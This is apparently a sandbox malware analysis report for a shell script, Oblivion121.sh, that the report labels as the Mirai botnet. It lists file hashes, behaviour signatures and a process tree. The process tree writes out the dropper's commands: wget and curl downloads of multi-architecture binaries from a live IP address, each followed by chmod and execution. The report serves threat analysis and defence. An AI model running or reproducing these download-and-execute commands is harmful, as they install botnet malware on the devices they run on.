Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    30s
  • max time network
    40s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    15-12-2024 10:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    90e5e43e5d798a41934d7f30e8208b24

  • SHA1

    0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7

  • SHA256

    09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233

  • SHA512

    ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032

Score
10/10
miraimiraiantivmbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

MIRAI

Extracted

Family

mirai

Botnet

MIRAI

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (4330) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 8 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Writes file to tmp directory
    PID:649
    • /usr/bin/wget
      wget http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:652
    • /usr/bin/curl
      curl -O http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:672
    • /bin/cat
      cat IGz.x86
      2⤵
        PID:714
      • /bin/chmod
        chmod +x cp IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
        2⤵
        • File and Directory Permissions Modification
        PID:716
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:718
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:721
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:731
      • /bin/cat
        cat IGz.mips
        2⤵
        • System Network Configuration Discovery
        PID:746
      • /bin/chmod
        chmod +x cp IGz.mips IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
        2⤵
        • File and Directory Permissions Modification
        PID:748
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:750
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Writes file to tmp directory
        PID:752
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:765
      • /bin/cat
        cat IGz.mpsl
        2⤵
          PID:768
        • /bin/chmod
          chmod +x cp IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
          2⤵
          • File and Directory Permissions Modification
          PID:769
        • /tmp/cp
          ./cp mpsl
          2⤵
          • Executes dropped EXE
          PID:770
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm4
          2⤵
            PID:773
          • /usr/bin/curl
            curl -O http://188.132.232.157/IGz/IGz.arm4
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:774
          • /bin/cat
            cat IGz.arm4
            2⤵
              PID:775
            • /bin/chmod
              chmod +x cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
              2⤵
              • File and Directory Permissions Modification
              PID:776
            • /tmp/cp
              ./cp arm4
              2⤵
              • Executes dropped EXE
              PID:777
            • /usr/bin/wget
              wget http://188.132.232.157/IGz/IGz.arm5
              2⤵
              • Writes file to tmp directory
              PID:778
            • /usr/bin/curl
              curl -O http://188.132.232.157/IGz/IGz.arm5
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:779
            • /bin/cat
              cat IGz.arm5
              2⤵
                PID:780
              • /bin/chmod
                chmod +x cp IGz.arm4 IGz.arm5 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
                2⤵
                • File and Directory Permissions Modification
                PID:781
              • /tmp/cp
                ./cp arm5
                2⤵
                • Executes dropped EXE
                PID:782
              • /usr/bin/wget
                wget http://188.132.232.157/IGz/IGz.arm6
                2⤵
                • Writes file to tmp directory
                PID:783
              • /usr/bin/curl
                curl -O http://188.132.232.157/IGz/IGz.arm6
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:784
              • /bin/cat
                cat IGz.arm6
                2⤵
                  PID:785
                • /bin/chmod
                  chmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
                  2⤵
                  • File and Directory Permissions Modification
                  PID:786
                • /tmp/cp
                  ./cp arm6
                  2⤵
                  • Executes dropped EXE
                  PID:787
                • /usr/bin/wget
                  wget http://188.132.232.157/IGz/IGz.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:788
                • /usr/bin/curl
                  curl -O http://188.132.232.157/IGz/IGz.arm7
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:789
                • /bin/cat
                  cat IGz.arm7
                  2⤵
                    PID:790
                  • /bin/chmod
                    chmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
                    2⤵
                    • File and Directory Permissions Modification
                    PID:791
                  • /tmp/cp
                    ./cp arm7
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:792
                  • /usr/bin/wget
                    wget http://188.132.232.157/IGz/IGz.ppc
                    2⤵
                    • Writes file to tmp directory
                    PID:796
                  • /usr/bin/curl
                    curl -O http://188.132.232.157/IGz/IGz.ppc
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:807
                  • /bin/chmod
                    chmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.ppc IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
                    2⤵
                    • File and Directory Permissions Modification
                    PID:809
                  • /tmp/cp
                    ./cp ppc
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:810
                  • /usr/bin/wget
                    wget http://188.132.232.157/IGz/IGz.m68k
                    2⤵
                    • Writes file to tmp directory
                    PID:814
                  • /usr/bin/curl
                    curl -O http://188.132.232.157/IGz/IGz.m68k
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:820
                  • /bin/chmod
                    chmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
                    2⤵
                    • File and Directory Permissions Modification
                    PID:825
                  • /tmp/cp
                    ./cp m68k
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:826
                  • /usr/bin/wget
                    wget http://188.132.232.157/IGz/IGz.sh4
                    2⤵
                    • Writes file to tmp directory
                    PID:830
                  • /usr/bin/curl
                    curl -O http://188.132.232.157/IGz/IGz.sh4
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:834
                  • /bin/chmod
                    chmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.sh4 IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU
                    2⤵
                    • File and Directory Permissions Modification
                    PID:836
                  • /tmp/cp
                    ./cp sh4
                    2⤵
                    • Executes dropped EXE
                    • Modifies Watchdog functionality
                    • Enumerates active TCP sockets
                    • Reads system network configuration
                    • Reads runtime system information
                    PID:837

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • /tmp/IGz.x86
                  Filesize

                  72KB

                  MD5

                  acd283bf65ed831dd470134f403a9294

                  SHA1

                  3c0f8231e8089430e32ef8daea73597170a2b4c0

                  SHA256

                  8d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67

                  SHA512

                  0847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72

                  Download Submit

                • /tmp/cp
                  Filesize

                  153KB

                  MD5

                  558fc8df865663836770a42334dd88c0

                  SHA1

                  0276f7274984928e64fbe354bb0df966d1eacb86

                  SHA256

                  b23789685e87bf3931a7cc2c8d33dcf4417332e5d5a5cd7778f97e063f8d9118

                  SHA512

                  561756714ec8c40ed714e350df57f3c494e0995cfb6e0ca9146d4b47651f66b20d2c11d0fd77f3f05b92ca4ec05f3ddfb532ac92287a316354d2ea432e3fea4e

                  Download Submit

                • /tmp/cp
                  Filesize

                  149KB

                  MD5

                  bb18c503add46a96288b7a15562dbbc7

                  SHA1

                  7d12569aea77474a3fa81c841d50fa0a2351f438

                  SHA256

                  b556b41e8071e7164f880963b24c4f2ae5fe28d2b71716e410a0f17a91eb607c

                  SHA512

                  9479a4c1784f08cfa7ee71b8d59841e81a581b3f9c0362ff8e11c6a4ccef2bf21460dafec49a770778cbb8e472fd7c000e00513e29363814bc6aa20ee34830ce

                  Download Submit

                • /tmp/cp
                  Filesize

                  277B

                  MD5

                  7d8ef5970f2b96d4b52dadc7799ec3f3

                  SHA1

                  e57969e79884c7c6c19254a56c1a2dc1beac99ea

                  SHA256

                  4d7e5dd9904c0d7d6760062fd67c68be810797911559604d3c3a9b1cf23a8ceb

                  SHA512

                  709bf7cf2e255b7a9cfe4a0f76a31af55cb53d8e843e05f1bda918a9f26de514813c08ffcb64829535ae268cf5acd73a1bf6c8d650d3070b93624cf8962e578d

                  Download Submit

                • /tmp/cp
                  Filesize

                  69KB

                  MD5

                  5497f5783f3eb4af7d3636a10ca61be4

                  SHA1

                  b0368826ff88407deff3fd60c5fefa1f0c376b75

                  SHA256

                  89b62e301cea7d89839dc2b046d0cef8fca89f90e750266935fb1e3bd6ba4087

                  SHA512

                  bca1f683daac0b9f3bddc08bc701d91c47e3a81d626628da2db2617dbeadc2394d8dadec92b4b321822a002bc5943600abc61d2c74d7eedc78ad747f48b29fc0

                  Download Submit

                • /tmp/cp
                  Filesize

                  151KB

                  MD5

                  736c31e68e569b75d420f45aa0a564a5

                  SHA1

                  86c6eaa1615dad670f8d87fec928f5b1aafb2c5e

                  SHA256

                  0cf773711a14965c3e7f9f7d6ce6ddf680ca633b3ae815d7759fd112d9fec91c

                  SHA512

                  10474f88e041956cf286e5567ec01362e6fb480050372db1057ff6f83b8a03d57a50f3bc447d3c8e210dadb86dd85649d21603580fb07ef4af709f9a98557256

                  Download Submit